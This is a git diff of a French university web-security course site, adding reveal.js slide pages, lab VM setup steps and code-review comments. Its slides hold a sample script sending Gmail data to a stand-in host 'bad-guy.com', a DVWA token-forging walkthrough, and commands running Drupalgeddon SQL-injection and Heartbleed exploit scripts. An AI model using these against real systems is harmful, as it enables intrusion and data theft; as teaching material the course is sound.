diff --git a/content/Etudiants/zz2-f5-websec.md b/content/Etudiants/zz2-f5-websec.md index 5ff48e548fdfe1ffee47dd50815edce8c19d51e6..97899453287133eb880d96624f6e0e594ee37ca8 100644 --- a/content/Etudiants/zz2-f5-websec.md +++ b/content/Etudiants/zz2-f5-websec.md @@ -5,6 +5,8 @@ Tags: cours [TOC] +## Supports de cours + <div class="panel panel-success"> <div class="panel-heading"> <h3 class="panel-title">đ Personnaliser les slides</h3> @@ -16,7 +18,40 @@ Tags: cours </div> </div> -## Contexte +<div class="panel panel-success"> + <div class="panel-heading"> + <h3 class="panel-title">đĄ Version PDF</h3> + </div> + <div class="panel-body"> + <ul> + <li>Tous les slides sont fait avec <a href="https://github.com/hakimel/reveal.js">reveal.js</a> + <ul> + <li>ils sont exportables en pdf en ajoutant <code>?print-pdf#</code> Ă l'url (Ă coller juste aprĂšs le <code>.html</code>) et en passant par l'impression dans un fichier du navigateur chrome ou (mieux) <a href="https://www.chromium.org/">chromium</a> + <ul> + <li>plus de dĂ©tails sur l'<a href="https://github.com/hakimel/reveal.js/#pdf-export">export PDF de reveal</a></li> + </ul> + </li> + </ul> + </li> + </ul> + </div> +</div> + +<div class="panel panel-success"> + <div class="panel-heading"> + <h3 class="panel-title">đȘ Contributions</h3> + </div> + <div class="panel-body"> + <ul> + <li> + n'hĂ©sitez pas Ă me signaler des liens morts et / ou Ă en proposer de nouveaux via une <a href="https://gitlab.isima.fr/vimazeno/blog.limos.fr/-/issues">issue</a> ou directement via un <a href="https://gitlab.isima.fr/vimazeno/blog.limos.fr/-/merge_requests">PR/MR</a> + </li> + </ul> + </div> +</div> + + +### Contexte <ul> <li> @@ -52,7 +87,7 @@ Tags: cours <li> <a href="slides/1337/heartbleed.html" class="customizable"> - Heartbleed <i class="fas fa-tools"></i> + Heartbleed </a> </li> </ul> 
@@ -60,13 +95,13 @@ Tags: cours <li> <a href="slides/1337/browser.html" class="customizable"> - Browsers <i class="fas fa-hammer"></i> + Browser </a> </li> <li> <a href="slides/1337/js.html" class="customizable"> - Javascript <i class="fas fa-hammer"></i> + Javascript </a> </li> <li> @@ -77,7 +112,7 @@ Tags: cours </li> </ul> -## VulnĂ©rabilitĂ©s communes +### VulnĂ©rabilitĂ©s communes <ul> <li> @@ -109,7 +144,7 @@ Tags: cours <li> <a href="slides/1337/shellshock.html" class="customizable"> - Shellshock <i class="fas fa-tools"></i> + Shellshock </a> </li> </ul> 
@@ -169,47 +204,26 @@ Tags: cours <li> <a href="slides/1337/drupalgeddon.html" class="customizable"> - Drupalgeddon <i class="fas fa-tools"></i> + Drupalgeddon </a> </li> </ul> </li> </ul> -## Pentesting +### Pentesting * [Collecter](slides/1337/gathering.html) * [DĂ©tecter](slides/1337/detecting.html) -## Se protĂ©ger +### Se protĂ©ger * [Top10](slides/1337/top10.html) * [anticiper](slides/1337/anticiper.html) <hr /> -<div class="panel panel-success"> - <div class="panel-heading"> - <h3 class="panel-title">FYI</h3> - </div> - <div class="panel-body"> - <ul> - <li>Tous les slides sont fait avec <a href="https://github.com/hakimel/reveal.js">reveal.js</a> - <ul> - <li>ils sont exportables en pdf en ajoutant <code>?print-pdf#</code> Ă l'url (Ă coller juste aprĂšs le <code>.html</code>) et en passant par l'impression dans un fichier du navigateur chrome ou (mieux) <a href="https://www.chromium.org/">chromium</a> - <ul> - <li>plus de dĂ©tails sur l'<a href="https://github.com/hakimel/reveal.js/#pdf-export">export PDF de reveal</a></li> - </ul> - </li> - </ul> - </li> - <li> - n'hĂ©sitez Ă me signaler des liens morts et / ou Ă en proposer de nouveaux via une <a href="https://gitlab.isima.fr/vimazeno/blog.limos.fr/-/issues">issue</a> ou directement via un <a href="https://gitlab.isima.fr/vimazeno/blog.limos.fr/-/merge_requests">PR/MR</a> - </li> - </ul> - </div> -</div> - +## Installer DVWA sur sa VM perso ## RecrĂ©er l'environnement de cours dans VirtualBox * testĂ© avec [VirtualBox 5.2.18](https://download.virtualbox.org/virtualbox/5.2.18/virtualbox-5.2_5.2.18-124319~Ubuntu~bionic_amd64.deb) sous [Ubuntu Bionic](http://releases.ubuntu.com/bionic/) 
@@ -240,11 +254,10 @@ wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/debian.ova wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/proxy.ova&dl=1 wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/kali.ova&dl=1 wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/thenetwork.ova&dl=1 -wget https://drive.mesocentre.uca.fr/d/69e5535b0b88425396d7/files/?p=/ubuntu-server-18.04.ova&dl=1 ``` <div class="panel panel-warning"> <div class="panel-heading"> - <h3 class="panel-title">FYI</h3> + <h3 class="panel-title">đą FYI</h3> </div> <div class="panel-body"> il y a environ 7 Go d'images, n'hĂ©sitez pas Ă vous les faire passer via des clĂ©s USB @@ -258,7 +271,6 @@ vboxmanage import debian.ova vboxmanage import proxy.ova vboxmanage import kali.ova vboxmanage import thenetwork.ova -vboxmanage ubuntu-server-18.04.ova ``` ### Configurer le rĂ©seau pour chaque vm @@ -268,7 +280,6 @@ vboxmanage modifyvm debian --nic1 natnetwork --nat-network1 natwebsec vboxmanage modifyvm proxy --nic1 natnetwork --nat-network1 natwebsec vboxmanage modifyvm kali --nic1 natnetwork --nat-network1 natwebsec vboxmanage modifyvm thenetwork --nic1 natnetwork --nat-network1 natwebsec -vboxmanage modifyvm ubuntu-server-18.04 --nic1 natnetwork --nat-network1 natwebsec ```  @@ -280,7 +291,6 @@ vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127. vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127.0.0.1]:1723:[172.16.76.143]:22" vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127.0.0.1]:1724:[172.16.76.144]:22" vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127.0.0.1]:1725:[172.16.76.145]:22" -vboxmanage natnetwork modify --netname natwebsec --port-forward-4 "ssh:tcp:[127.0.0.1]:1726:[172.16.76.146]:22" ``` ### (optionnel) Se connecter en ssh 
@@ -293,7 +303,7 @@ ssh -p 1725 mazenovi@127.0.0.1 #kali ssh -p 1726 mazenovi@127.0.0.1 #ubuntu server 18.04 ``` -## (fix) En cas de rĂ©seau injoignable sur proxy et thenetwork +### (fix) En cas de rĂ©seau injoignable sur proxy et thenetwork si @@ -368,7 +378,7 @@ ping 172.16.76.145 # ping sur kali Ce bug est dĂ» Ă la numĂ©rotation fantaisiste d'Ubuntu des interfaces rĂ©seau ... -## liste des vms / noms de domaine +### Liste des vms / noms de domaine (/etc/hosts) ``` # SecLab diff --git a/content/slides/1337/bruteforce.html b/content/slides/1337/bruteforce.html new file mode 100644 index 0000000000000000000000000000000000000000..3fc0aff4d393bf2f1672169026b79fdd5ddbe708 --- /dev/null +++ b/content/slides/1337/bruteforce.html 
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>Brute Force</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/bruteforce.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
+ Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/1337/captcha.html b/content/slides/1337/captcha.html
new file mode 100644
index 0000000000000000000000000000000000000000..04279c32752d0454c2c554db43ad377c50aed966
--- /dev/null
+++ b/content/slides/1337/captcha.html
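Review bot: The fragment callback in this new page is written with loose pre-ES6 idioms: `var fragIndex = ele.innerHTML.indexOf("--")` has no terminating semicolon, the test `fragIndex != -1` uses loose equality, and `ele.className = 'fragment'` throws away whatever class the markdown plugin already put on the `<li>`. Tighten it to `var fragIndex = ele.innerHTML.indexOf("--");`, `if (fragIndex !== -1) {` and `ele.classList.add('fragment');`. Apart from `<title>` and the `data-markdown` path, the page is byte-identical to captcha.html, csp.html and session.html added in this same commit (and presumably sop.html, whose hunk lies past the end of this chunk), so a single shared template or generated page would keep the copies from drifting; the same remarks apply to those hunks and are not repeated there.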
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>Captcha</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/browser.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
+ Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/1337/csp.html b/content/slides/1337/csp.html
new file mode 100644
index 0000000000000000000000000000000000000000..cd6be269718e49448534e1241d9a38d1b0c9fd10
--- /dev/null
+++ b/content/slides/1337/csp.html
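Review bot: The new captcha deck loads the wrong markdown source: `<section data-markdown="md/browser.md"` will show the browser slides, while this same commit renames `md/captacha.md` to `md/captcha.md`, which looks like the intended content. Change it to `<section data-markdown="md/captcha.md"`. Since the `<title>` is already `Captcha`, this reads as a copy-paste slip from the browser page rather than a deliberate choice.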
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>CSP</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/csp.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
+ Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/1337/js.html b/content/slides/1337/js.html
index c747cb5be2733541adfc63310815ca0527059bf1..809957e39c02ed8ae4bacffa39035ef3d82b3ef4 100644
--- a/content/slides/1337/js.html
+++ b/content/slides/1337/js.html
@@ -11,7 +11,7 @@
 <!-- Theme used for syntax highlighting of code -->
 <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
-<link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+<link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
 <link rel="stylesheet" href="../main.css">
 
 <!-- Printing and PDF exports -->
diff --git a/content/slides/1337/md/browser.md b/content/slides/1337/md/browser.md
index 7a47608459ec76e0fe1e57bf52dfefcef37b9d98..62fdfc6efe7e147381a2219957df860016dcdb3b 100644
--- a/content/slides/1337/md/browser.md
+++ b/content/slides/1337/md/browser.md
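Review bot: Swapping `font-awesome/css/font-awesome.min.css` for `@fortawesome/fontawesome-free/css/all.min.css` changes the icon naming scheme, and the decks this commit touches still mix both: md/js.md uses the newer `fa-solid fa-bomb` form while md/csp.md (split out of browser.md here) keeps Font Awesome 4 names such as `fa fa-newspaper-o`. If the installed fontawesome-free package is v5 or later, the `-o` outline names are gone (`fa-newspaper-o` became `far fa-newspaper`) and that icon will render blank. Worth a pass over the markdown sources to use one naming scheme consistently; the deck version in node_modules is not visible in this diff, so confirm against the installed package.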
@@ -22,119 +22,4 @@ Un navigateur web est un logiciel conçu pour consulter et afficher le World Wid * [Navigateur web](https://fr.wikipedia.org/wiki/Navigateur_web) * [moz://a > Lâhistoire des navigateurs web](https://www.mozilla.org/fr/firefox/browsers/browser-history/) -Dans la plupart des cas un navigateur embarque un interprĂ©teur [javascript](js.html): ce qui induit quelque garde fous ... - - -## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives) - -* En-tĂȘte renvoyĂ©e cĂŽtĂ© serveur - * protĂ©ger son contenu - * protĂ©ger ses utilisateurs - * possibilitĂ© de reporting - * quelles tentatives ont Ă©tĂ© menĂ©es - - -## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives) - -```http -Content-Security-Policy: script-src 'self' https://apis.google.com; frame-src 'none' -``` - -* informera le browser que - * seuls les scripts en provenance de la page elle mĂȘme et de apis.google.com pourront ĂȘtre exĂ©cutĂ©s - * les balises iframes ne doivent pas ĂȘtre interprĂ©tĂ©es - - -## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives) - -<!-- .element style="text-align: center" --> - -* [<i class="fa fa-newspaper-o"></i> Why is CSP Failing? 
Trends and Challenges in CSP Adoption](mweissbacher.com/publications/csp_raid.pdf) - -Note: -- couvre le cas d'un XSS js dans une balise src -- couvre Ă©galement le cas d'une iframe qui recouvre une page lĂ©gitime - - -## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/) - - * concerne *XMLHttpRequest* - * restreint les interactionsaux ressources de mĂȘme origine - * protocole + "://" + hĂŽte + ":" + [port] - - -## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/) - -protĂšge l'intĂ©gritĂ© de la page - -```js -$(function() { // on Load jQuery style - $.ajax({ - url: "http://bad-guy.com/data.php" - }).done(function(untrustedData) { - injectInMyDOM(untrustedData); - }); -}); -``` - -<!-- .element style="text-align: center" --> - - -## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/) - -protĂšge la confidentialitĂ© des sessions - -```js -$(function() { // on Load jQuery style - $.ajax({ - url: "https://gmail.com" - }).done(function(sensitiveData) { - $.post("http://bad-guy.com/data.php", { - sensitive_data: sensitiveData - }); - }); -}); -``` - - -## [<i class="fa fa-medkit"></i> **CORS**: Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS) - -* contrĂŽler les accĂšs en mode cross-site - * concerne l'Ă©change entre fournisseurs de services -* effectuer des transferts de donnĂ©es sĂ©curisĂ©s - * entre sources sĂ»res niveau injection & confidentialitĂ© - - -## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS) - -le client ajoute automatiquement une en-tĂȘte HTTP - -```http -Origin: http://www.foo.com -``` - -le serveur doit ajouter une en tĂȘte HTTP d'autorisation pour le domaine - -```http -Access-Control-Allow-Origin: http://www.foo.com -``` - -en-tĂȘte 
d'autorisation pour tous les domaines - -```http -Access-Control-Allow-Origin: * -``` - - -## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS) - -* autorise tous les verbes HTTP - * [JSONP](http://igm.univ-mlv.fr/~dr/XPOSE2009/ajax_sop_jsonp/jsonp_presentation.html) n'autorisait que la mĂ©thode GET - - * [<i class="fab fa-stack-overflow"></i> Disable firefox same origin policy](http://stackoverflow.com/questions/17088609/disable-firefox-same-origin-policy) - -Note: -- l'introduction de cette nouvelle possibilitĂ© implique nĂ©cessairement que les serveurs doivent gĂ©rer de nouvelles entĂȘtes, et doivent renvoyer les ressources avec de nouvelles entĂȘtes Ă©galement -- doit ĂȘtre supportĂ© par le navigateur -- la valeur * est possible mais risquĂ©e -- requĂȘtes simples, prĂ©-vĂ©rifiĂ©es avec le verbe OPTIONS, avec habilitations en forcant l'envoie du cookie +Dans la plupart des cas un navigateur embarque un interprĂ©teur [javascript](js.html): ce qui induit quelque garde fous ... \ No newline at end of file diff --git a/content/slides/1337/md/bruteforce.md b/content/slides/1337/md/bruteforce.md new file mode 100644 index 0000000000000000000000000000000000000000..5c515973ba22ff75383154dc8bda3ef8c3efca5c --- /dev/null +++ b/content/slides/1337/md/bruteforce.md @@ -0,0 +1 @@ +# Brute Force \ No newline at end of file diff --git a/content/slides/1337/md/captacha.md b/content/slides/1337/md/captcha.md similarity index 100% rename from content/slides/1337/md/captacha.md rename to content/slides/1337/md/captcha.md diff --git a/content/slides/1337/md/csp.md b/content/slides/1337/md/csp.md new file mode 100644 index 0000000000000000000000000000000000000000..c9ad867f7dee1a9ae9368b1c58129a9b914cce70 --- /dev/null +++ b/content/slides/1337/md/csp.md 
@@ -0,0 +1,36 @@ +# CSP + +## a.k.a. Content Security Policy + + +## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives) + +* En-tĂȘte renvoyĂ©e cĂŽtĂ© serveur + * protĂ©ger son contenu + * protĂ©ger ses utilisateurs + * possibilitĂ© de reporting + * quelles tentatives ont Ă©tĂ© menĂ©es + + +## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives) + +```http +Content-Security-Policy: script-src 'self' https://apis.google.com; frame-src 'none' +``` + +* informera le browser que + * seuls les scripts en provenance de la page elle mĂȘme et de apis.google.com pourront ĂȘtre exĂ©cutĂ©s + * les balises iframes ne doivent pas ĂȘtre interprĂ©tĂ©es + + +## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives) + +<!-- .element style="text-align: center" --> + +* [<i class="fa fa-newspaper-o"></i> Why is CSP Failing? Trends and Challenges in CSP Adoption](mweissbacher.com/publications/csp_raid.pdf) + +Note: +- couvre le cas d'un XSS js dans une balise src +- couvre Ă©galement le cas d'une iframe qui recouvre une page lĂ©gitime + + diff --git a/content/slides/1337/md/drupalgeddon.md b/content/slides/1337/md/drupalgeddon.md index af15842d579bdd07fa22a1e5fdbf76ab9bf80caa..440e199d4cebfd15094cfc013b15fea6815e8d8a 100644 --- a/content/slides/1337/md/drupalgeddon.md +++ b/content/slides/1337/md/drupalgeddon.md 
@@ -172,7 +172,7 @@ $ php attack/inject-sql.php 'http://drup.al' 'DELETE FROM flood' * [Drupal 7 Sql Injection SA-CORE-2014-005 CVE-2014-3704](http://www.homelab.it/index.php/2014/10/17/drupal-7-sql-injection/) ```shell -python drup4l_7_31_SqlInj_add_admin.py -t http://drup.al -u 1337 -p 1337 +python2 drup4l_7_31_SqlInj_add_admin.py -t http://drup.al -u 1337 -p 1337 ``` * reprĂ©sente 26% d'utilisation de la faille * industrialisĂ© pour vendre du viagra diff --git a/content/slides/1337/md/heartbleed.md b/content/slides/1337/md/heartbleed.md index 26e25bd1bc2bbcab9408406709d99a408ae0f7ed..a7b98228bc75d074180c58f8f0e3dce7fe51835b 100644 --- a/content/slides/1337/md/heartbleed.md +++ b/content/slides/1337/md/heartbleed.md @@ -171,7 +171,7 @@ PORT STATE SERVICE ### exploit <i class="fa fa-spinner fa-spin"></i> ```bash -$ python hb-test.py heart.bleed > hb.dump \ +$ python2 hb-test.py heart.bleed > hb.dump \ && cat hb.dump | tail -n +10 | head -n 40 00e0: 63 65 70 74 2D 4C 61 6E 67 75 61 67 ..Accept-Languag 00f0: 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E e: en-US,en;q=0. diff --git a/content/slides/1337/md/js.md b/content/slides/1337/md/js.md index 2f9ae0c06e8f4f96f0e2f9f2f0cd025cfedfee93..f80d2495e4553ccb5b6eac526e34d35a15437242 100644 --- a/content/slides/1337/md/js.md +++ b/content/slides/1337/md/js.md 
@@ -165,4 +165,118 @@ directement dans les Ă©vĂ©nements associĂ©s Ă un Ă©lĂ©ment du DOM * https://www.typescriptlang.org/ * https://nodejs.org/ * https://fr.reactjs.org/ -* https://vuejs.org/ \ No newline at end of file +* https://vuejs.org/ + + +### <i class="fa-solid fa-bomb"></i> Javascript / Low + +* analyse de la requĂȘte / formulaire + * champs hidden `token` + * https://beautifier.io + ``` + token = md5(rot13(phrase)) + ``` + +* forcer + ``` + token = md5(rot13("success")) + ``` + * via la console / explorer du navigateur (F12) + + +### <i class="fa-solid fa-bomb"></i> Javascript / Medium + +* analyse de la requĂȘte / formulaire + * champs hidden `token` + ``` + "XX" + reverse("ChangeMe") + "XX" + ``` + +* forcer + ``` + token = "XXsseccusXX" + ``` + * via la console / explorer du navigateur (F12) + + +### <i class="fa-solid fa-bomb"></i> Javascript / High + +* analyse de la requĂȘte / formulaire + * champs hidden `token` + * interception de la requĂȘte avec `burpsuite` + * la valeur soumise n'est pas celle du champs original +* le code js est incomprĂ©hensible + * <i class="fa-solid fa-screwdriver-wrench"></i> [http://deobfuscatejavascript.com](http://deobfuscatejavascript.com/#) + + +### <i class="fa-solid fa-bomb"></i> Javascript / High + +1. + ```js + document + .getElementById("phrase") + .value = ""; + ``` +2. + ```js + token_part_1("ABCD", 44); + ``` + * + ```js + do_something(phrase); + ``` + * inverse la phrase + * mais elle est vide + + +### <i class="fa-solid fa-bomb"></i> Javascript / High + +3. `token_part_2("XX")` est exĂ©cutĂ©e aprĂšs 300ms + ```js + document + .getElementById("token") + .value = sha256( + "XX" + + document + .getElementById("phrase") + .value + ) + ``` + * c'est bien la valeur du token pour une phrase vide + + +### <i class="fa-solid fa-bomb"></i> Javascript / High + +4. 
La soumission du formulaire dĂ©clenche `token_part_3("ZZ")` + * le paramĂštre `t` n'est pas utilisĂ© + * le jeton envoyĂ© dans la requĂȘte est + +```js +sha256(document.getElementById("token").value + "ZZ") +``` +```js +sha256( + sha256("XX" + document.getElementById("phrase").value) + + "ZZ" +) +``` + + +### <i class="fa-solid fa-bomb"></i> Javascript / High + +* considĂ©rant qu'en `2` la phrase a Ă©tĂ© inversĂ©e + +```js +token = sha256(sha256("XX" + "sseccus") + "ZZ") +//ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84 +``` + + * mais `token_part_3` est toujours appelĂ© Ă la soumission du formulaire + * il faut forcer token avec + +```js +sha256("XX" + "sseccus") +//7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a +``` + +et bien mettre la phrase Ă `success` \ No newline at end of file diff --git a/content/slides/1337/md/session.md b/content/slides/1337/md/session.md new file mode 100644 index 0000000000000000000000000000000000000000..6f937a2ea6f7076343184ad31dbece177ff313a4 --- /dev/null +++ b/content/slides/1337/md/session.md @@ -0,0 +1 @@ +# session \ No newline at end of file diff --git a/content/slides/1337/md/sop.md b/content/slides/1337/md/sop.md new file mode 100644 index 0000000000000000000000000000000000000000..457770d2889e1c7e89474b13c820d7ee7afd8d90 --- /dev/null +++ b/content/slides/1337/md/sop.md 
@@ -0,0 +1,86 @@ +# SOP + +## a.k.a Same Origin Policy + +## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/) + + * concerne *XMLHttpRequest* + * restreint les interactionsaux ressources de mĂȘme origine + * protocole + "://" + hĂŽte + ":" + [port] + + +## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/) + +protĂšge l'intĂ©gritĂ© de la page + +```js +$(function() { // on Load jQuery style + $.ajax({ + url: "http://bad-guy.com/data.php" + }).done(function(untrustedData) { + injectInMyDOM(untrustedData); + }); +}); +``` + +<!-- .element style="text-align: center" --> + + +## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/) + +protĂšge la confidentialitĂ© des sessions + +```js +$(function() { // on Load jQuery style + $.ajax({ + url: "https://gmail.com" + }).done(function(sensitiveData) { + $.post("http://bad-guy.com/data.php", { + sensitive_data: sensitiveData + }); + }); +}); +``` + + +## [<i class="fa fa-medkit"></i> **CORS**: Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS) + +* contrĂŽler les accĂšs en mode cross-site + * concerne l'Ă©change entre fournisseurs de services +* effectuer des transferts de donnĂ©es sĂ©curisĂ©s + * entre sources sĂ»res niveau 